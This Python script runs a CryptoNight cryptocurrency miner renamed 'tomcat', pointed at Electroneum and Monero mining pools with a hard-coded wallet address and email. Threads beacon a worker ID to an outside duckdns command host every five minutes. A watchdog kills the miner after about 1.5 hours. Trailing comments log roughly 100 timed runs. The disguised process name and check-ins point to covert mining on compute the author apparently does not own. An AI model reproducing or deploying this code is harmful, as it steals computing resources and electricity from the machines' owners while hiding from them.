import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:02.028841
#2018-02-17 15:59:04.707036
#2018-02-17 17:47:04.942272
#2018-02-17 19:34:03.759918
#2018-02-17 21:23:07.472543
#2018-02-17 23:07:05.051764
#2018-02-18 00:54:03.546893
#2018-02-18 02:42:06.902395
#2018-02-18 04:31:04.298667
#2018-02-18 06:22:04.520271
#2018-02-18 08:11:01.955673
#2018-02-18 09:57:06.847065
#2018-02-18 11:44:01.539243
#2018-02-18 13:29:07.382353
#2018-02-18 15:19:01.775809
#2018-02-18 17:07:06.582851
#2018-02-18 18:54:06.587327
#2018-02-18 20:42:07.205150
#2018-02-18 22:28:03.840658
#2018-02-19 00:17:03.505971
#2018-02-19 02:03:05.711984
#2018-02-19 03:50:01.624817
#2018-02-19 05:34:05.769467
#2018-02-19 07:22:06.405675
#2018-02-19 09:12:02.189022
#2018-02-19 11:01:08.588150
#2018-02-19 12:49:06.797701
#2018-02-19 14:36:06.072849
#2018-02-19 16:24:06.392929
#2018-02-19 18:10:09.666027
#2018-02-19 19:58:02.090177
#2018-02-19 21:46:01.980795
#2018-02-19 23:34:04.981060
#2018-02-20 01:20:08.021844
#2018-02-20 03:11:07.296096
#2018-02-20 04:58:04.581450
#2018-02-20 06:42:05.807366
#2018-02-20 08:27:06.441683
#2018-02-20 10:12:06.181692
#2018-02-20 11:56:01.688530
#2018-02-20 13:45:07.125743
#2018-02-20 15:29:06.418405
#2018-02-20 17:16:10.367995
#2018-02-20 19:05:10.113976
#2018-02-20 20:53:08.128958
#2018-02-20 22:38:08.528947
#2018-02-21 00:21:03.991624
#2018-02-21 02:07:06.761381
#2018-02-21 03:55:06.453169
#2018-02-21 05:43:03.467407
#2018-02-21 07:31:05.321682
#2018-02-21 09:16:06.951742
#2018-02-21 11:05:07.917724
#2018-02-21 12:52:08.262907
#2018-02-21 14:39:08.459205
#2018-02-21 16:25:10.161783
#2018-02-21 18:16:04.632404
#2018-02-21 20:03:01.461162
#2018-02-21 21:50:06.641416
#2018-02-21 23:36:03.925701
#2018-02-22 01:26:07.735882
#2018-02-22 03:15:06.264602
#2018-02-22 05:03:03.862216
#2018-02-22 06:46:03.821343
#2018-02-22 08:35:09.300777
#2018-02-22 10:24:01.641576
#2018-02-22 12:10:10.693066
#2018-02-22 13:56:08.962756
#2018-02-22 15:43:07.447998
#2018-02-22 17:32:07.998753
#2018-02-22 19:20:02.008836
#2018-02-22 21:11:08.542660
#2018-02-22 22:56:04.044280
#2018-02-23 00:42:09.141235
#2018-02-23 02:28:07.741217
#2018-02-23 04:17:06.916314
#2018-02-23 06:05:02.090371
#2018-02-23 07:50:07.000480
#2018-02-23 10:08:06.401703
#2018-02-23 11:58:04.953379
#2018-02-23 13:47:07.350612
#2018-02-23 15:35:07.997192
#2018-02-23 17:23:08.790592
#2018-02-23 19:08:07.624738
#2018-02-23 20:54:06.469260
#2018-02-23 22:39:06.673825
#2018-02-24 00:26:07.335311
#2018-02-24 02:17:05.372726
#2018-02-24 04:06:05.868450
#2018-02-24 05:54:04.445682
#2018-02-24 07:41:05.372198
#2018-02-24 09:26:06.397460
#2018-02-24 11:20:08.942399
#2018-02-24 13:10:01.661804
#2018-02-24 15:00:09.759179
#2018-02-24 16:50:05.361610
#2018-02-24 18:38:06.386522
#2018-02-24 20:29:06.653551
#2018-02-24 22:26:06.977804
#2018-02-25 01:36:01.942335
#2018-02-25 04:29:05.166432
#2018-02-25 07:23:04.293459
#2018-02-25 11:40:01.929382
#2018-02-25 14:02:01.610651
#2018-02-25 15:36:01.798625